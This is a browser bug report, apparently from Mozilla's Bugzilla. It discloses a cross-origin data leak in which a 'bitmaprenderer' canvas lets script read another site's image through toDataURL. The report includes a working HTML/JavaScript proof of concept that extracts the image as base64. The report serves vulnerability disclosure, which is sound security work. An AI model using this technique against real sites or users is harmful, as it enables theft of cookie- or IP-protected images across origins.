(Hidden by Administrator)
Bug 1526218 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36 Steps to reproduce: If the crossorigin attribute is not specified for an image, the image may be rendered in a bitmap canvas; the data can be accessced by JavaScript. A proof of concept is shown below. ``` <html><body> <script charset="utf-8"> function getData() { createImageBitmap(this, 0, 0, this.naturalWidth, this.naturalHeight).then(function(bmap) { var can = document.createElement('canvas'); var ctx = can.getContext('bitmaprenderer'); ctx.transferFromImageBitmap(bmap); document.getElementById('result').textContent = can.toDataURL(); }); } </script> <img src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/> <br/><textarea readonly style="width:100%;height:10em" id="result"></textarea> </body></html> ``` Actual results: The image, which should not be accessible to JavaScript from origins other than https://duckduckgo.com is in fact rendered in the tainted canvas and its base64-encoded contents are displayed. Images on external domains protected by cookies or IP whitelisting can therefore be stolen using Cross-site Request Forgery even if the target server does not give CORS access to other domains. Expected results: An error should have been thrown similar to the error shown when rendering tainted canvases in a 2D context: "The operation is insecure."